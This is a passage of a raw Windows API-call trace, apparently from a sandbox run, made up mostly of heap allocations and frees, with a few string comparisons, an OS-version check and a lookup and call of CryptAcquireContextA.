[0264.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0264.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0264.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0264.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0264.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0264.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.541] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0264.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0264.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0264.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.542] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0264.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0264.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.542] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0264.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.542] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0264.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.542] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0264.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.543] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0264.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.543] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0264.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0264.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0264.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0264.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0264.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0264.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.545] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0264.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0264.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0264.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0264.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e30, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0264.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0264.547] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0264.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0264.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e30, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0264.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0264.548] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0264.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0264.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0264.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0264.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0264.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0264.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0264.548] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0264.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0264.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0264.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0264.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0264.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0264.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0264.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0264.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0264.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0264.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0264.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0264.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0264.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0264.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0264.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.554] HeapFree (in: hHeap=0x25c0000, 